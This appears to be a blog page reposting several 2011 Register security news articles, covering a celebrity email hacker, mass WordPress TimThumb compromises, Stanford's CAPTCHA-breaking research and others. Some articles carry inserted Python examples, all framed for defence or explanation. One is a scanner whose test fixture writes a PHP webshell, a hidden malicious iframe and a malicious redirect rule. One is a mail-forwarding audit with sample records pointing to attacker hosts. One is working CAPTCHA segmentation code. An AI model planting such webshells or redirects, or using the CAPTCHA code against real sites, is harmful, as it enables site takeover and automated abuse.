STE WILLIAMS

Premium-rate calls watchdog to join battle against pirates

The UK’s regulator of premium rate services (PRS) will pass on details of copyright infringing websites to service providers under a new “proactive” arrangement with police and music industry representatives, it has announced.

PhonepayPlus said that PRS providers notified of copyright infringing sites could be charged under the Proceeds of Crime Act (POCA) if they then subsequently made “arrangements” with operators of the illicit sites to help users pay for the pirated music.

“It is important to note that, if any provider has been put on notice that a service is illegal and either continues to provide, or subsequently provides, payment services to, or for, the site(s) in question, the provider may be criminally liable under Section 328 of the Proceeds of Crime Act,” the regulator said in a notice to PRS providers. Under POCA a person is generally guilty of an offence if they enter into or become concerned in arrangements they know or suspect “facilitate (by whatever means) the acquisition, retention, use or control of criminal property by or on behalf of another person”.

Under the new notification scheme the City of London Police (CoLP) and the International Federation of the Phonographic Industry (IFPI) will inform PhonepayPlus of “any promotional material, including but not limited to websites” that is suspected of offering illegally copied music to be downloaded through “premium rate means”, the regulator said. The information will then be passed on to individual PRS providers “to ensure they are aware of the potential risks of contracting with clients associated with such promotional material,” it said.

To date PhonepayPlus has received notice of 24 infringing websites and police are currently investigating 38 other “unlicensed services”, the regulator said.

PhonepayPlus said it was taking the “proactive” step to notify providers of potential infringers because of the “risk” that copyright infringers would try to sell pirated music through PRS. It said Visa, Mastercard and PayPal were already working with CoLP and IFPI to prevent the sale of illegal content through their services.

“Until relatively recently, pirated music downloads were almost exclusively paid for by consumers using credit cards,” PhonepayPlus said.

“However, following discussions between IFPI and CoLP and providers of credit card services, credit card companies have begun to identify and exclude merchants offering pirated music. There is therefore a risk that those who still intend to offer pirated music may now turn to PRS as a quick and easily accessible form of payment. While there is little evidence at present of pirated music being offered using PRS, PhonepayPlus has agreed to work proactively with the IFPI and the CoLP in order to prevent potentially criminal activity damaging the ongoing reputation of the overall PRS market,” the regulator said.

Claire Smith, copyright law expert at Pinsent Masons, the law firm behind Out-Law.com, said that owners of copyrighted music could also sue some companies involved in operating PRS if those firms do not prevent customers paying for copyright-infringing content that they have been notified about under the UK’s E-Commerce Regulations.

Under the Regulations a service provider is generally not liable for any copyright-infringing material accessed by users of its service if it “acts as a mere conduit, caches the material, or hosts the material”.


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/03/prs_copyright/

Accused Hollywood hacker does about face, pleads not guilty

A Florida man has pleaded not guilty to charges he broke into the email accounts of actresses Scarlett Johansson and Mila Kunis, and as many as 50 other celebrities, and made off with nude photos and personal information.

Christopher Chaney, 35, of Jacksonville, Florida, denied the allegations contained in a 26-count indictment filed last month during his first court appearance on Tuesday in California, where the charges were filed. US Magistrate Judge Patrick Walsh increased Chaney’s bail to $110,000 from $10,000 after prosecutors presented evidence he may have stalked three additional victims, including a 13-year-old girl.

Chaney’s denial came after he publicly apologized for the crime during a television news segment broadcast by Jacksonville, Florida, television station WAWS.

“It started as curiosity and it turned to just being addictive,” Chaney said in front of a video camera. “Seeing the behind-the-scenes of what’s going on with the people you see on the big screen. I was almost relieved when they came in and took the computers inside.”

Indeed, even after federal investigators seized Chaney’s computers in February, the defendant continued his hacking scheme against an unnamed actress for six more months, the Associated Press reported, citing a prosecutor in the case.

“We have great concern that he can’t stop himself,” the news service quoted US Attorney Lisa Feldman as saying.

According to federal prosecutors, Chaney obtained personal information about his victims and used it to breach the email accounts of more than 50 individuals in the entertainment world. Other celebrities allegedly targeted by Chaney included pop singer Christina Aguilera, actress Renee Olstead, and fashion designer Simone Harouche. Nude pictures he lifted from Johansson’s account eventually were published on gossip sites, prompting a federal investigation.

After Chaney accessed the accounts, hosted by Apple, Google and Yahoo, he switched on their automatic forwarding feature, so that a copy of every new message was sent instantly to a separate account he controlled.
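The forwarding trick above is the part of this case a mail administrator can actually look for. The following is an added example, not code from the article or from the investigation: it reads constructed audit records (the key=value line format and field names are assumptions for this example) and flags mailboxes whose forwarding or filter rules send mail to a domain outside the organisation, or that delete the original so the owner never sees what went out.

```python
"""Audit mail-forwarding changes for exfiltration indicators.

Added example (not from the original article). Given audit records
describing changes to a mailbox's forwarding settings, flag forwarding to
addresses outside the organisation's own domains, which is how the attack
described above kept copies of every new message flowing out.
"""
import re
from dataclasses import dataclass

# Constructed sample audit lines; the line format is an assumption for this example.
SAMPLE_AUDIT = """\
2011-02-03T09:12:01Z user=alice@example.com action=login ip=203.0.113.5
2011-02-03T09:13:44Z user=alice@example.com action=set_forwarding target=alice.backup@example.com
2011-02-03T09:14:10Z user=bob@example.com action=set_forwarding target=collector@evil.example
2011-02-03T09:15:00Z user=carol@example.com action=add_filter match=* forward=relay@attacker.example delete_original=true
2011-02-03T09:16:30Z user=dave@example.com action=set_forwarding target=
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kv>.*)$")


@dataclass
class Finding:
    timestamp: str
    user: str
    target: str
    reason: str


def parse_line(line):
    """Split one 'timestamp key=value key=value' record into a dict (None if malformed)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields = {"ts": m.group("ts")}
    for token in m.group("kv").split():
        if "=" in token:
            key, _, value = token.partition("=")
            fields[key] = value
    return fields


def domain_of(addr):
    """Domain part of an e-mail address, lower-cased."""
    return addr.rpartition("@")[2].lower()


def find_suspicious_forwarding(audit_text, trusted_domains):
    """Return Findings for forwarding/filter rules that leak mail outside trusted domains."""
    trusted = {d.lower() for d in trusted_domains}
    findings = []
    for raw in audit_text.splitlines():
        fields = parse_line(raw)
        if not fields:
            continue
        action = fields.get("action")
        # set_forwarding uses 'target'; a filter rule uses 'forward' (assumed field names)
        target = fields.get("target") or fields.get("forward")
        if action not in ("set_forwarding", "add_filter") or not target:
            continue  # not a forwarding change, or forwarding was cleared
        reasons = []
        if domain_of(target) not in trusted:
            reasons.append("forwards to external domain")
        if fields.get("delete_original") == "true":
            reasons.append("deletes original (hides forwarding from the owner)")
        if reasons:
            findings.append(Finding(fields["ts"], fields["user"], target, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_forwarding(SAMPLE_AUDIT, ["example.com"]):
        print(f"{f.timestamp} {f.user} -> {f.target}: {f.reason}")
```

The internal forward set by alice is ignored and dave's cleared rule is skipped; bob and carol are reported. In practice the same check belongs on a schedule, since a rule added during a short window of access keeps working long after the password is changed.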

The AP also cited search warrants and other evidence suggesting Chaney may have stalked the online activities of three other people. One possible victim was a 13-year-old girl; another was a Connecticut woman who had allegedly been surveilled for the past 12 years.

Chaney’s attorney told the AP the new allegations are completely false.

In a brief article published Tuesday by Vanity Fair, Johansson showed no regrets for snapping nude photos of herself and storing them on an internet-facing account.

“I know my best angles,” she said. “They were sent to my husband. There’s nothing wrong with that. It’s not like I was shooting a porno.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/scarlett_johansson_hacker_denial/

Secunia jumps on vuln reward bandwagon

Secunia has launched yet another vulnerability rewards program, the Secunia Vulnerability Coordination Reward Program, which it says is designed to operate independently of particular software vendors.

The company says the idea is to make life easier for researchers, by concentrating vulnerability reporting to a single entity, rather than leaving them to deal with multiple vendors’ reporting procedures and rewards programs.

Vendor programs, the company says, have a “business model wrapped around them,” and therefore can be selective in which bugs win a bounty. The Secunia program will accept any vulnerability in off-the-shelf software.

In a blog post announcing the scheme, Secunia’s Carsten Eiram says the “fun part” of research is in discovering a vulnerability or exploit, rather than in the “sometimes extensive coordination and liaison” with vendors.

Under this program, he says, Secunia will “both confirm vulnerability discoveries and handle the coordination process”.

The service could also fill a gap, the company says, for researchers who don’t wish to sell their vulnerabilities, or don’t want to constrain their research to those bugs that happen to fit “the requirements of existing initiatives”.

Rather than cash, Secunia’s rewards will include merchandise and two “major annual rewards” for hotel accommodation and entry to major security conferences.

The program’s criteria are that the vulnerability affects a stable product; it affects the latest version of the product; the product has active vendor support; the vulnerability is not already public; and Secunia can replicate the vulnerability. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/secunia_vulnerability_rewards/

Notorious eBay hacker gets 3-year suspended sentence

Vladuz, the Romanian hacker who repeatedly accessed off-limits parts of eBay’s website and then publicly taunted company officials over the security lapses, has been handed a suspended three-year sentence, according to news reports.

The Bucharest appeal court issued the sentence on Wednesday to 23-year-old Vlad Duiculescu, AFP reported. He was arrested in Romania in 2008, with help from US Secret Service agents, after eBay said his exploits caused at least $1 million in damage. He was imprisoned for almost two years before being released last year.

From 2005 to 2007, Duiculescu adopted the moniker Vladuz and repeatedly breached eBay security by accessing parts of the website reserved for company employees. In March 2007, he secured credentials that allowed him to masquerade as an eBay official on company forums, one of which was related to trust and safety. It was at least the third time in as many months he had intruded into restricted sections of the website. The string of attacks fueled suspicions that hackers had gained backdoor access to the site.

The lapses were an embarrassment to eBay officials as they worked to assure customers that the site was secure, but there was never any proof that the site had a backdoor. It is not clear what Duiculescu did to cause more than $1 million in damage. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/03/ebay_hacker_sentenced/

Thousands of WordPress sites commandeered by Black Hole

Mass attacks that exploit a known vulnerability in the WordPress publishing platform have continued to bear fruit for hackers, with thousands of websites claimed in the past few weeks, a researcher said.

The security bug, in a widely used image resizing utility known as TimThumb, allows attackers to seize control of WordPress websites, one of the victims warned nine weeks ago. A few days later, a security researcher found almost 4,400 WordPress sites had been commandeered in an attack that poisoned Google Image results with sites that attempted to trick users into installing counterfeit antivirus software. He speculated the cause was the same TimThumb exploit.

Although a fix for the TimThumb vulnerability has been available for more than two months, plenty of websites remain vulnerable. According to a research report published by Avast on Monday, thousands of websites have been infected by Black Hole, a hack-by-numbers toolkit sold in underground forums for about $1,500, with a scaled-down version available free. The kit plants an iframe in infected sites that silently redirects visitors to malicious sites.

“The bad guys are using a security vulnerability in non-updated TimThumb,” Avast researcher Jan Sirmer wrote. “This allows attackers to upload and execute arbitrary PHP code in the TimThumb cache directory which will download other malicious files.”

Avast alone blocked the redirection attempts from 3,500 unique websites in August and 2,515 sites last month, and Sirmer said he expects to see similar results this month. That may be only a small percentage of the total number of infected sites, since Avast is used by a small minority of people browsing the web. Sirmer said attackers may have compromised some of the websites by exploiting weak passwords.

Once a site is infected, it is not always easy to remove all the malicious code. Denis Sinegubko, the Russian researcher who discovered the WordPress attack used to poison Google Image results, has advised webmasters of compromised sites to look for rogue rules in .htaccess files, both in the site root and in the directories above it, since rules there apply to the site as well. ®
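The three indicators named above (PHP dropped into a TimThumb cache directory, an injected hidden iframe, and conditional redirect rules in .htaccess files at or above the document root) can be checked mechanically. What follows is an added example, not Avast’s or Sinegubko’s tooling: it builds a small constructed WordPress-like tree in a temporary directory so it runs offline, then scans it. The file names, the cache-directory name and the redirect patterns are assumptions based on the description in the article.

```python
"""Scan a WordPress document root for the compromise indicators named in the
article: PHP in a TimThumb cache directory, hidden iframes, and .htaccess
rules that redirect visitors arriving from a search engine to an external
site. Added example; the sample site is constructed inline."""
import os
import re
import tempfile

PHP_TAG = re.compile(r"<\?(php|=)", re.I)
# iframe with zero size or hidden styling: the usual drive-by injection shape
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*(width\s*=\s*[\"']?0|height\s*=\s*[\"']?0|"
    r"display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>", re.I)
# conditional on referer/user-agent + rewrite to an absolute external URL
REWRITE_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_(REFERER|USER_AGENT)\}", re.I | re.M)
EXTERNAL_REWRITE = re.compile(r"^\s*RewriteRule\s+\S+\s+https?://", re.I | re.M)


def check_file(path, docroot):
    """Return (path, indicator) tuples for one file."""
    findings = []
    try:
        with open(path, errors="replace") as fh:
            text = fh.read()
    except OSError:
        return findings
    rel_parts = os.path.normpath(os.path.relpath(path, docroot)).split(os.sep)
    if "cache" in rel_parts and PHP_TAG.search(text):
        findings.append((path, "PHP code in a cache directory"))
    if HIDDEN_IFRAME.search(text):
        findings.append((path, "hidden iframe"))
    if os.path.basename(path) == ".htaccess" and REWRITE_COND.search(text) \
            and EXTERNAL_REWRITE.search(text):
        findings.append((path, "conditional redirect to external site"))
    return findings


def scan_site(docroot, parents_up=2):
    """Walk the document root, then look at .htaccess files above it."""
    findings = []
    for dirpath, _, files in os.walk(docroot):
        for name in files:
            findings.extend(check_file(os.path.join(dirpath, name), docroot))
    parent = docroot
    for _ in range(parents_up):  # rules above the root still apply to it
        parent = os.path.dirname(parent)
        htaccess = os.path.join(parent, ".htaccess")
        if os.path.isfile(htaccess):
            findings.extend(check_file(htaccess, docroot))
    return findings


def build_sample_site():
    """Constructed fixture: one clean and one infected file of each kind."""
    base = tempfile.mkdtemp(prefix="wp-")
    docroot = os.path.join(base, "public_html")
    cache = os.path.join(docroot, "wp-content", "themes", "demo", "timthumb", "cache")
    files = {
        os.path.join(cache, "external_0123abcd.txt"):
            "<?php eval(base64_decode($_GET['c'])); ?>",          # dropped webshell
        os.path.join(cache, "external_legit.jpg"): "JFIF placeholder bytes",
        os.path.join(docroot, "index.php"):
            "<?php get_header(); ?>\n"
            "<iframe src=\"http://bad.example/in.cgi\" width=\"0\" height=\"0\" "
            "style=\"visibility:hidden\"></iframe>\n",
        os.path.join(docroot, "wp-content", "themes", "demo", "style.css"): "body { color: #000; }",
        os.path.join(docroot, ".htaccess"):
            "# BEGIN WordPress\nRewriteEngine On\nRewriteRule ^index\\.php$ - [L]\n",
        os.path.join(base, ".htaccess"):                           # above the docroot
            "RewriteEngine On\nRewriteCond %{HTTP_REFERER} google\\. [NC]\n"
            "RewriteRule .* http://bad.example/?q=$1 [R,L]\n",
    }
    for path, content in files.items():
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return docroot


if __name__ == "__main__":
    for path, why in scan_site(build_sample_site()):
        print(f"{why}: {path}")
```

The rule match for .htaccess deliberately needs both a referer/user-agent condition and an absolute external target, so the stock WordPress rewrite block is not reported; a real clean-up should still read every matched file by hand rather than deleting on a regex hit.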

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/wordpress_mass_compromise/

Report: Popular CAPTCHAs easily defeated

Security researchers have found that the large majority of the text-based anti-spam tests they examined are easily defeated.

Computer scientists from Stanford University discovered 13 of 15 CAPTCHA schemes from popular websites were vulnerable to automated attacks. The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) has been used for several years to prevent automated sign-ups to webmail accounts or online forums in order to block spam bots. Surfers are typically asked during a registration process to identify distorted letters as depicted in an image. A variety of other approaches – including pictures of cats, audio clips and calculus puzzles – have been applied to the problem over the years.

Cybercrooks have responded to the challenge posed by CAPTCHAs by devising techniques that typically involve semi-automatically signing up for new accounts, while relying on the human cogs in 21st century sweatshops – typically located in India – to solve the CAPTCHA puzzles themselves.

The Stanford team, by contrast, looked at whether it was possible to fully automate the process of breaking CAPTCHAs. Their techniques included removing deliberately introduced background noise from the image and segmenting text strings into single characters for easier recognition. The team built an automated tool, called Decaptcha, that applied these various tricks. The approach was partially inspired by techniques used to orient robots in unknown environments.
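The two preprocessing steps described above are simple enough to show end to end. The following is an added example, not the Stanford team’s Decaptcha code: it takes a constructed binary CAPTCHA bitmap (‘#’ is ink, ‘.’ is background; three block glyphs plus three stray noise pixels), strips noise by dropping connected components below a size threshold, and then splits the cleaned image into characters by vertical projection (runs of columns that contain ink). Running the segmentation on the raw image first shows why the noise removal matters: the stray pixels widen two of the characters and create a fourth, empty one.

```python
"""Noise removal and character segmentation for a text CAPTCHA.

Added example, not Decaptcha. The image is a constructed bitmap of three
glyphs (T, L, O) with three single-pixel noise dots.
"""

SAMPLE = [
    ".........#......",
    ".###..#....###..",
    "..#...#....#.#..",
    "..#...#....#.#.#",
    "..#...#....#.#..",
    "..#...###..###..",
    "....#...........",
]


def components(image):
    """8-connected components of ink pixels, each as a set of (row, col)."""
    height, width = len(image), len(image[0])
    seen, comps = set(), []
    for r in range(height):
        for c in range(width):
            if image[r][c] != "#" or (r, c) in seen:
                continue
            stack, comp = [(r, c)], set()
            seen.add((r, c))
            while stack:  # iterative flood fill
                y, x = stack.pop()
                comp.add((y, x))
                for dy in (-1, 0, 1):
                    for dx in (-1, 0, 1):
                        ny, nx = y + dy, x + dx
                        if (0 <= ny < height and 0 <= nx < width
                                and image[ny][nx] == "#" and (ny, nx) not in seen):
                            seen.add((ny, nx))
                            stack.append((ny, nx))
            comps.append(comp)
    return comps


def remove_noise(image, min_size=3):
    """Keep only components with at least min_size pixels; real glyphs are larger."""
    keep = set()
    for comp in components(image):
        if len(comp) >= min_size:
            keep |= comp
    height, width = len(image), len(image[0])
    return ["".join("#" if (r, c) in keep else "." for c in range(width))
            for r in range(height)]


def segment(image):
    """Column spans (first, last) of consecutive inked columns: one per character candidate."""
    width = len(image[0])
    inked = [any(row[c] == "#" for row in image) for c in range(width)]
    spans, start = [], None
    for c, ink in enumerate(inked + [False]):  # sentinel closes the last run
        if ink and start is None:
            start = c
        elif not ink and start is not None:
            spans.append((start, c - 1))
            start = None
    return spans


def crop(image, span):
    """Cut one segment out and drop blank rows, ready for a per-character classifier."""
    first, last = span
    rows = [row[first:last + 1] for row in image]
    return [r for r in rows if "#" in r]


def extract_characters(image, min_size=3):
    """Full pipeline: denoise, segment, crop."""
    clean = remove_noise(image, min_size)
    return [crop(clean, span) for span in segment(clean)]


if __name__ == "__main__":
    print("raw segmentation:    ", segment(SAMPLE))
    print("cleaned segmentation:", segment(remove_noise(SAMPLE)))
    for glyph in extract_characters(SAMPLE):
        print("\n".join(glyph), end="\n\n")
```

Projection-based segmentation is exactly what the paper’s countermeasures target: characters that touch or overlap leave no empty column to cut on, and random font sizes defeat a fixed size threshold for noise.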

Decaptcha was turned against the challenge response CAPTCHAs used by 15 high-profile websites, enjoying excellent bowling figures against the majority.

For example, Visa’s Authorize.net payment gateway CAPTCHA was defeated 66 per cent of the time. eBay’s CAPTCHA was sidestepped 43 per cent of the time. Lower, but still workable, bypass rates were achieved against Wikipedia, Digg and CNN.

Google and reCAPTCHA were the only two CAPTCHA systems that consistently thwarted Decaptcha during the tests.

Authorize.net and Digg have both switched to reCAPTCHA since these tests were run, Computerworld adds.

In a research paper (PDF), the Stanford team suggest several approaches to making CAPTCHAs harder to beat, including varying the length of the text string and randomising character font and size. Lines in the background of CAPTCHAs might also prove effective. In addition, the Stanford team highlighted features that are ineffective against automated attacks but merely hinder human users.

The researchers, Elie Bursztein, Matthieu Martin and John C Mitchell, who previously developed techniques for breaking audio CAPTCHAs, presented their latest research at the recent ACM Conference on Computer and Communications Security in Chicago. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/popular_captchas_easily_defeated/

Anonymous confusion in clash with Mexican drug cartel

Plans by Anonymous to expose members and associates of a Mexican drug cartel have reportedly been abandoned, at least locally, amid doubts whether a member of the hacking collective was ever really kidnapped by the group.

In an ultimatum posted on YouTube on 6 October (and much later in English), Anonymous threatened to publish data on cartel members and affiliates in Veracruz unless an unnamed male kidnap victim was released by 5 November. The kidnapping supposedly happened during a street protest in the Mexican state of Veracruz or a leafleting campaign (reports vary). The hackers threatened to expose journalists, taxi drivers and corrupt cops that have collaborated with the cartel.

Los Zetas – a ruthless gang of drug traffickers known for kidnap, mass murder and hanging bloggers by their own intestines – reportedly responded to the ultimatum by hiring computer experts to track down individuals involved in the online anti-cartel campaign, dubbed #OpCartel.

Two self-identified OpCartel participants, Skill3r and Glyniss Paroubek, told Mexican newspaper Milenio on Sunday that the operation had been abandoned (following an internal debate) as “too risky” because it placed even those outside the hacker group in danger.

This might be just as well because security analysts warned that if Anonymous exposed details of the Zetas’ operations this would almost certainly result in further bloodshed. Outing cartel members would act as a motive for reprisal attacks against bloggers. Meanwhile rival gangs might target those named on the list, regardless of its authenticity or accuracy.

“If Anonymous is able to increase the effectiveness of online operations seeking to expose cartel activities then that makes them and other anti-cartel bloggers in Mexico much higher profile targets than before,” security analyst firm Stratfor warns.

“We have seen reports that Los Zetas are deploying their own teams of computer experts to track those individuals involved in the online anti-cartel campaign, which indicates that the criminal group is taking the campaign very seriously. Those individuals involved face the risk of abduction, injury and death — judging by how Los Zetas has dealt with threats in the past,” it adds.

Anonymous members in the English-speaking world may still continue the campaign to release the details of Los Zetas collaborators, even without the involvement of their compadres in Mexico. Notorious Anonymous hacker Sabu, for example, tweeted: “# OpCartel is more alive than ever and as I told others in private, the war against corruption is on both sides of the spectrum. We are going to WAR!”

Conflicting statements from within the Anonymous camp have prompted a re-examination of #OpCartel more generally. Many have begun questioning whether an Anonymous member was ever kidnapped in Veracruz, the Guardian reports. For one thing, issuing an ultimatum demanding the release of an unnamed person makes no sense. And why is there no mention of a date for the supposed kidnapping, or any police report of a missing person associated with PaperStorm, the Anonymous-organised event in December and March referenced in the YouTube videos?

Some have begun describing the kidnapping pretext – if not Operation Cartel itself – as a hoax.

Purported organisers of #OpCartel posted on the website called Anonymous IberoAmerica. “The Anonymous IberoAmerica site is now soliciting anonymous tips on cartel collaborators,” the Guardian concludes. “That suggests that, if the promised revelations materialise, they could be nothing more than common rumours or gossip sent in by tipsters or foes of those named.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/anonymous_retreats_from_operation_cartel/

Palestine fingers Israel for blasting Gaza off the net

A Palestinian minister is blaming foreign hackers for taking out internet services and servers in the West Bank and Gaza.

Palestinian communications minister Mashur Abu Daqqa blames the Israeli state for what he describes as a coordinated DDoS attack against core communication systems.

“Since this morning all Palestinian IP addresses have come under attack from places across the world,” the minister told AFP on Tuesday. “I think from the manner of the attack and its intensity that there is a state behind it, and it is not spontaneous.

“Israel could be involved as it announced yesterday that it was considering the kind of sanctions it would impose on us.”

The disruption comes a day after the United Nations Educational, Scientific and Cultural Organisation voted to admit Palestine as a member of the group, a move that went down badly in Israel, the Washington Post adds.

Abu Daqqa said the Palestinian banking system had been isolated from the attack, a claim that is yet to be independently confirmed.

Conflict in cyberspace is one aspect of a propaganda battle that has accompanied the decades-long Israeli-Palestinian conflict. Routinely this involves defacing websites of one side or the other, but sometimes slightly more sophisticated tactics are brought into play. In the past, for example, Israeli cyberactivists have invited pro-Israeli surfers to install a tool that attacks websites associated with Hamas. Hamas has controlled Gaza since June 2007. Its rival Fatah controls the West Bank. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/palestinian_net_attack/

Supersleuthing BOFHs could help crack cybercrimes

LCC System administrators should be the detectives in cyber investigations, a top Microsoft security bod said.

It wasn’t helpful for cops to go blundering into companies’ networks to look for evidence in cybercrimes, because the sysadmin will know where to look for that information, said Scott Charney, VP of trustworthy computing group at MS.

“The evidence you need to investigate cybercrime is often in the hands of the private sector… and in these cases, the sysadmin becomes lead investigator in the cybercrime case,” he said.

Charney, who was previously chief of the Computer Crime and Intellectual Property Section for the US Justice Department, said that companies often didn’t want to collaborate with government investigations because they were afraid they’d have to open up their networks. But in reality, it was better for the firm’s IT staff, who know the network, to search for the evidence, he said.

In the great anonymity versus accountability debate, Charney argued that what was needed was a bit of both.

“What increasingly became clear [in my career] is that you had to ask the question at one level up. Do you want anonymity or accountability in certain things on the net?” he said. “For internet banking – we want robust authentication. But if I’m engaged in certain kinds of speech I may want anonymity and society should support that anonymity.”

“The reason for anonymity is that it protects important values like free speech… and things we want to support as human rights. On the other hand, criminals do bad things so you want accountability,” he added.

Charney also said that everyone already knows what to do about cybercrime, but getting it done was the problem.

“Strategically we know what to do but tactically it’s hard,” he said. “What we need to do is harmonise national laws and build capability in countries all over the world and then you need to establish 24/7 contacts so that you can access knowledgeable people in any country at any time so that you can at least freeze the info you need before it’s gone… and then find a quick way to get that information to the agency that needs it.”

Charney was speaking at the London Conference on Cyberspace (LCC), which is hosting debates on issues like cyber security, cybercrime, the digital divide and internet freedoms. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/sys_admins_should_help_cybercrime_probes/

Experts: Firms need to come clean about cyber attacks

LCC Businesses need to ‘fess up when they’ve been the victims of cyber attacks, experts at the London Conference on Cyberspace (LCC) said today.

Government and biz bosses said that even though companies didn’t really want to own up to having been breached, they needed to start sharing information with officials to protect critical infrastructures.

Erik Akerboom, president of the Cyber Security Council in the Netherlands, said that his government needed to know about the DigiNotar hack when it happened, not later on.

“We needed information at the time that DigiNotar was hacked; it was hacked in June but we didn’t find out then,” he said.

Digital certificate firm DigiNotar was hacked in June this year, and forged Google.com SSL certificates were then used to spy on some 300,000 Iranian internet users. The incident became notorious over the summer when it emerged that the firm’s security was wholly inadequate, and because it took so long for the company to come clean.

DigiNotar only started to revoke certificates in mid-July, and didn’t go public with the security issue until August. The company subsequently filed for bankruptcy, having lost all the trust its business relied upon.

Akerboom said that the Netherlands was considering making it compulsory for firms to inform the government when their networks were attacked, but the government would then keep the information confidential to protect the companies’ business.

Matthew Kirk, group external affairs director at Vodafone, said it would be tough to make businesses disclose attacks without a better trust relationship between companies and governments.

“Our instinct as a company is much more self-regulation rather than compulsory on almost everything. But I think there’s a critical role for government, which is not so much compulsion but creating… trust,” he said.

“I think it needs to be done in an atmosphere where it’s actually in the companies’ interest to disclose,” he added.

Harry van Dorenmalen, chairman of IBM Europe and also a member of the National Security Council in the Netherlands, was more forceful about what should be expected of the private sector.

“I think the private sector in general needs to step up much more than they do,” he said, adding that if businesses found it difficult to go to the government individually, they should consider presenting issues to the government through business groups.

“That’s an appeal to the private sector to step up, be vocal and be connected,” he said. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/business_need_to_confess_cyber_attacks/